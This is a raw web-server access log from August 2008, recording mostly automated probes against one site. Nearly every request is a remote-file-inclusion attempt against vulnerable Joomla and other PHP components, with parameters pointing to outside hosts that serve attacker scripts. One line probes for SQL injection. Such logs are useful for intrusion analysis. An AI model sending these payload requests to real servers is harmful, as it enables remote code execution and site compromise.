64.22.89.194 - - [10/Aug/2008:12:03:01 -0700] "GET /logs/access_080115.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:03:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:03:02 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:03:11 -0700] "GET /logs/access_080222.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:12:03:39 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:12:03:39 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:12:03:39 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:03:54 -0700] "GET /?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18535 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:03:55 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://primeraconchali.cl/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.133.96.246 - - [10/Aug/2008:12:04:01 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.96.246 - - [10/Aug/2008:12:04:01 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:12:04:14 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:12:04:14 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:04:15 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:04:16 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:04:16 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:04:27 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:04:28 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:04:36 -0700] "GET //include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:12:04:36 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:04:46 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:04:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:04:47 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:04:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:05:34 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:05:52 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:05:52 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:05:52 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:05:59 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:05:59 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:05:59 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:05:59 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:06:00 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:06:00 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:06:00 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://primeraconchali.cl/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:06:01 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://primeraconchali.cl/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.235.216.69 - - [10/Aug/2008:12:06:02 -0700] "GET / HTTP/1.0" 200 18241 "-" "Mozilla/3.0 (compatible)" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:06:05 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:06:06 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:06:12 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:06:13 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:06:13 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:06:14 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:06:15 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:06:15 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:06:35 -0700] "GET /logs/?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 59997 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:12:06:51 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:12:06:54 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:12:06:55 -0700] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:06:58 -0700] "GET /?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18535 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:07:16 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:07:24 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:07:25 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.68.17 - - [10/Aug/2008:12:07:25 -0700] "GET /logs/access_080315.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://neomatrix.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.236.242 - - [10/Aug/2008:12:07:35 -0700] "GET /logs/access_080215.log/shop.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [10/Aug/2008:12:07:35 -0700] "GET /shop.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [10/Aug/2008:12:07:35 -0700] "GET /logs/shop.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:39 -0700] "GET /logs/access_080303.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:39 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:41 -0700] "GET /logs/access_080303.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:42 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.71.249.147 - - [10/Aug/2008:12:07:44 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:55 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:12:07:57 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:12:08:00 -0700] "GET /logs/access_080321.log/help.php?css_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:12:08:00 -0700] "GET /logs/help.php?css_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:12:08:00 -0700] "GET /help.php?css_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.46.85 - - [10/Aug/2008:12:08:13 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:08:26 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.70.84.27 - - [10/Aug/2008:12:08:28 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
208.80.193.31 - - [10/Aug/2008:12:08:45 -0700] "GET / HTTP/1.0" 200 18209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iOpus-I-M; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
216.246.46.85 - - [10/Aug/2008:12:08:50 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.246.46.85 - - [10/Aug/2008:12:08:50 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.246.46.85 - - [10/Aug/2008:12:08:50 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.77 - - [10/Aug/2008:12:08:51 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.246.46.85 - - [10/Aug/2008:12:08:58 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:09:33 -0700] "GET /php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://primeraconchali.cl/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:12:10:03 -0700] "GET /logs/index2.php?content=http://www.tsg-ringen-herdecke.de/blog//textpattern/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:12:10:04 -0700] "GET /index2.php?content=http://www.tsg-ringen-herdecke.de/blog//textpattern/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:10:15 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
75.125.140.178 - - [10/Aug/2008:12:10:16 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
75.125.140.178 - - [10/Aug/2008:12:10:16 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
217.199.191.194 - - [10/Aug/2008:12:10:19 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
217.199.191.194 - - [10/Aug/2008:12:10:20 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.86.146.46 - - [10/Aug/2008:12:10:23 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.86.146.46 - - [10/Aug/2008:12:10:23 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:10:45 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:10:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:10:46 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.134.22.225 - - [10/Aug/2008:12:10:46 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.134.22.225 - - [10/Aug/2008:12:10:49 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:11:04 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:11:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:11:05 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:11:23 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:11:58 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:11:58 -0700] "GET /logs/access_080315.log/joomla/index.php?option=com_restaurante&task=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:11:58 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:11:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:11:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:12:12:02 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.60 - - [10/Aug/2008:12:12:04 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:12:20 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:12:12:20 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
